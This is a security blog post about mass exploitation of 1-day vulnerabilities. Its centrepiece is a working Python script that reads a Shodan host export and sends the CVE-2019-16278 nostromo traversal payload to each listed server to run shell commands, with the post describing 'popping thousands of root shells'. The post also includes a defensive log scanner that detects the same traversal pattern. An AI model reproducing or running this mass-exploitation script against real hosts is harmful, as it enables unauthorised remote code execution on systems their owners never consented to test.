Hello Luvs,

This post is just another brain dump, like the last post. Today we are going to talk about mass exploitation. Criminals usually use mass exploitation to control as many hosts as they can. As you may know, I've worked on a tool called Hunter Suite, which aimed to be a revolution for bug hunting. But my life is so unpredictable these days; I'm not sure when or if I really can finish it (too much work for one boy). That's why I started sharing my thoughts in the hope that someone out there will find it useful.

Introduction

Botnets are generally very successful at exploiting vulnerable IoT and web targets because of the sheer number of exploitable hosts out there. You can check out the list of exploits used by Mirai and, more recently, Mozi. The fun fact is that most bot authors are not familiar with exploit development concepts (even though IoT exploits are a breeze to write compared to harder stuff like browsers), so they usually use public and, in most cases, outdated exploits.

One component of Hunter Suite is to exploit hot vulnerabilities, using either of these two methods:

Slightly modify and use an excellent 1-day exploit:
    fix reliability issues and crashes
    change payloads

Conduct a patch analysis to mine a 1-day:
    reverse the patch and extract the bug
    write an exploit



What's a good 1-day exploit?

Well, it depends, but usually you don't want to waste your time writing an exploit for a target with <5 users.

So, for example, in the case of web exploitation, here are some worthy targets:

Content management systems (also their plugins):
    WordPress
    Joomla
    Drupal
    ...

Backend web frameworks:
    Rails
    Django
    Laravel
    ...

Front-end frameworks:
    Vue
    Angular
    React
    Bootstrap
    ...

Web servers:
    Nginx
    Apache
    Lite HTTP
    ...

Internet of Things:
    big-market routers
    IP cameras
    SCADA
    ...

You get the idea.

Practicality

As you aren't malicious, you won't need an implant or backdoor. Botnets usually have to create various versions of their implants (MIPS, ARM, x86, x64, etc.) to maximize their infection rate.

Next is to scan the whole target IP space (e.g., your bug bounty pipeline) for vulnerable assets. There are a few tools on the market for attack surface discovery, like assetnote.io and immuniweb. You can also leverage APIs like shodan.io, zoomeye.org and censys.io to make your life easier. Here is an illustration for visual people.

CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE

As you see in all my previous posts, I like to have a practical case study. For the sake of this post, I chose a very recent vulnerability in nhttpd.

Here is the original exploit, and here is a detailed vulnerability analysis. So let's jump into a live example. If we search for Nostromo in, for instance, shodan.io, we will see thousands of running instances.

Now, all we have to do is detect and exploit the vulnerable instances. As I already talked about before, these days this can be speedy. So all we have to do is parse our host list (in this case a Shodan export) and try to exploit the vulnerable instances.

Here is how your script could look:



""" @author: 0xSha @contact: [email protected] @organization: www.0xsha.io """ import csv import requests # in case of debugging and hosting detection # import json # import time def read_hosts_from_csv(): """ reads the shodan cvs dump and extract host and ports @:parameter none :return: host lists """ path = '/shodan-export.csv' host_lists = [] with open(path, newline='') as csvfile: records = csv.reader(csvfile) for record in records: host_lists.append(record[0] + ":" + record[1]) return host_lists if __name__ == '__main__': # proxy = {"http": "http://127.0.0.1:8080"} exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh" for host in read_hosts_from_csv(): host, port = host.split(':') # Lazy Me if "IP" not in host: # Debugging request # req = requests.post('http://' + host + ":" + port+exp, # data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";', timeout=3, # proxies=proxy) try: cmd = "whoami;id;uname -a" print("[~] Trying ... " + host, port) req2 = requests.post('http://' + host + ":" + port + exp, data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";', timeout=10) # change the timeout if needed # print (req2.status_code) # print (req2.text) firstIndex = str(req2.text).find('~~~~~~~~~~') secondIndex = str(req2.text).find('##########') if firstIndex: print("#################### Vulnerable #######################") print("[+] Now exploiting "+host) print(str(req2.text)[firstIndex + 10:secondIndex]) # Host Detection # time.sleep(10) # req3 = requests.get( # 'https://www.who-hosts-this.com/APIEndpoint/Detect?key' # '=YOUR_API_KEY&url=' + host) # isp = json.loads(req3.text) # print("Hosted by:" + isp['results'][0]['isp_name']) print("#################### End #######################") except: # print('Err' + host) pass

You can also download the script from here. Now, all we have to do is run our script and pour ourselves a coffee.
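For the defensive side, here is an added example (not part of the original post and not the author's code) that flags this exploit's traversal trick in web-server access logs: it percent-decodes the request path, strips the CR/LF bytes that `%0d`/`%0a` decode to, and only then looks for `..` segments, so both the encoded path used by the script above and plain `../` requests are caught. The log lines are constructed samples in common log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in common log format (not real traffic).
# The first request uses the same encoded path as the exploit script above.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2019:10:21:03 +0000] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 200 512
198.51.100.7 - - [15/Nov/2019:10:21:04 +0000] "GET /index.html HTTP/1.1" 200 1024
198.51.100.9 - - [15/Nov/2019:10:21:05 +0000] "GET /images/../../etc/passwd HTTP/1.1" 404 0
192.0.2.3 - - [15/Nov/2019:10:21:06 +0000] "GET /docs/a..b.html HTTP/1.1" 200 300
"""

# Captures client, method, path and status; the request line is "METHOD PATH PROTO".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def normalize_path(raw_path):
    """Bring a request path into the form the file system would see:
    drop the query string, percent-decode twice (catches double encoding),
    remove CR/LF bytes (what %0d / %0a decode to) and collapse '//' runs."""
    path = raw_path.split('?', 1)[0]
    decoded = unquote(unquote(path))
    cleaned = decoded.replace('\r', '').replace('\n', '')
    return re.sub(r'/+', '/', cleaned)


def is_traversal(raw_path):
    """True when any segment of the normalized path is exactly '..'.
    Checking segments (not substrings) avoids flagging names like 'a..b.html'."""
    return any(seg == '..' for seg in normalize_path(raw_path).split('/'))


def scan_log(text):
    """Return one record per log line whose request path is a traversal."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        if is_traversal(path):
            hits.append({"client": client, "method": method, "raw": path,
                         "normalized": normalize_path(path), "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("[!] %(client)s %(method)s %(raw)s -> %(normalized)s (%(status)d)" % hit)
```

The same normalization belongs in a WAF or reverse-proxy rule: checking the raw, still-encoded path is exactly the gap this exploit walks through.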

Popping thousands of root shells

Here is the video for demo lovers.

Conclusion

The number of vulnerable hosts out there is unbelievable. More internet-wide bug bounty programs are needed to slay these bugs; otherwise botnets will keep getting easy wins just using 1-day exploits.

Careful luvs, what I demonstrate here can get you in legal trouble. In my case, I didn't alter, download, or touch any data on any of the few servers I tested, and the only commands I ran are harmless id to prove the vulnerability. Do not pwn what you don't own.

So here is a summary:

know your assets

set the alarm for worthy patches and exploits

continuously scan your pipeline for new instances

detect and exploit

report and claim your bounty

Infosec has always been a part of my life. I made a living out of it, but I somehow feel people care less every day (maybe because they can't do anything about it?!). So in the end, I'm probably better off creating drama TV shows ;) rather than talking about fuzzing, exploitation, reverse engineering and how I spend thousands of bucks and most of my life on infosec and SciTech. Yet again, here I am.

till then luvs